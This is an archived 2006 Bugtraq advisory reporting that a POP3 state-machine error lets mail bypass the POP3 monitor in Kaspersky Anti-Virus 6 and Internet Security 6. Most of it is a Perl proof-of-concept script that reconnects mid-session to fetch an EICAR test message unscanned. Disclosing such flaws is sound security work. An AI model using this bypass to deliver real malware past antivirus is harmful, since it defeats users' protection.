Kaspersky antivirus 6: POP3 state machine error

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Kaspersky antivirus 6: POP3 state machine error
From: bug.registrator@xxxxxxxxx
Date: 23 May 2006 20:20:09 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Kaspersky antivirus 6
Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to POP3 state machine error in POP3 monitor 
(Kaspersky Mail-antivirus). 

Any mailicious software on local computer can bypass POP3 virus monitor. 

Solution:

There is no known solution.

Exploit code:

Put eicar.com test file into your mailbox using subject 'eicar', correct this 
perl script (change POP3-server address, your acount name and the pasword) and 
run the script with ActiveState Perl 5.8:

#! /usr/bin/perl -w

use IO::Socket::INET;
use strict;

my( $h_srv, $h_port, $h_user, $h_pwd ) = ( YOUR.POP3.SERVER.IP/FQDN, 'pop(110)',
                                           YOUR-ACCOUNT, YOUR-PASSWORD );
my( $g_str, $g_trc_out, $g_trc_in ) = ( '', 0, 0 );

my $server = pop3_connect();

sendthem( $server, "LIST" );
die "bad LIST command: $g_str" unless read_line( $server ) =~ /^\+OK/;

my @lst;
for( ;; ) {
    my $str = read_line( $server );
    last if $str =~ /^.$/;
    push @lst, $1 if $str =~ /^(\d+)\s+/;
}
syswrite STDOUT, "msgs: ".(join ' ', @lst)."\n";

# !!! comment next line to have it working ;)
$server = pop3_connect( $server );

foreach( @lst ) {
    my $uidl = $_;
    sendthem( $server, "RETR $uidl" );
    die "bad RETR command: $g_str" unless read_line( $server ) =~ /^\+OK/;
    my $msg = '';
    for( ;; ) {
        my $str = read_line( $server );
        last if $str =~ /^.$/;
        $msg .= $str."\n";
    }
    syswrite STDOUT, "got: $uidl (".(length $msg)." bytes)\n";
    syswrite STDOUT, $msg if $msg =~ /eicar/i;
}

sub pop3_connect {
    my( $sock ) = @_;

    syswrite STDOUT, "connecting to $h_srv:$h_port (as $h_user)\n";

    $sock->close if $sock;
    $sock = IO::Socket::INET->new( PeerAddr => $h_srv,
                                   PeerPort => $h_port,
                                   Proto    => 'tcp' );
    die "socket: $!" unless $sock;
    die "wrong answer: $g_str" unless read_line( $sock ) =~ /^\+OK/;
    sendthem( $sock, "USER $h_user" );
    die "bad account: $g_str" unless read_line( $sock ) =~ /^\+OK/;
    sendthem( $sock, "PASS $h_pwd" );
    die "bad password: $g_str" unless read_line( $sock ) =~ /^\+OK/;
    $sock;
}

sub sendthem {
    my $sock = shift;
    foreach( @_ ) {
        my @a = split //, $_;
        syswrite STDOUT, "cln: " if $g_trc_out;
        foreach( @a ) {
            sendone( $sock, $_ );
        }
        sendone( $sock, "\r" );
        sendone( $sock, "\n" );
    }
}

sub sendone {
    my( $sock, $v ) = @_;
    die "send: " if length $v != $sock->syswrite( $v );
    syswrite STDOUT, $v if $g_trc_out;
}

sub read_line {
    my( $sock ) = @_;
    my $str = '';
    for( ;; ) {
        my $v = '';
        my $r = $sock->sysread( $v, 1 );
        die 'EOF reading headers!' unless $r;
        last if $v eq "\n";
        next if $v eq "\r";
        $str .= $v;
    }
    syswrite STDOUT, "srv: $str\r\n" if $g_trc_out;
    $g_str = $str;
}

Prev by Date: Re: mybb v1.1.1(rss.php) SQL Injection Exploit
Next by Date: phpFoX All Version Login Exploit
Previous by thread: [CLOSED] SOE's implementation of Lithium Forums Software allows users to log on as each other.
Next by thread: Re: Kaspersky antivirus 6: POP3 state machine error
Index(es):
- Date
- Thread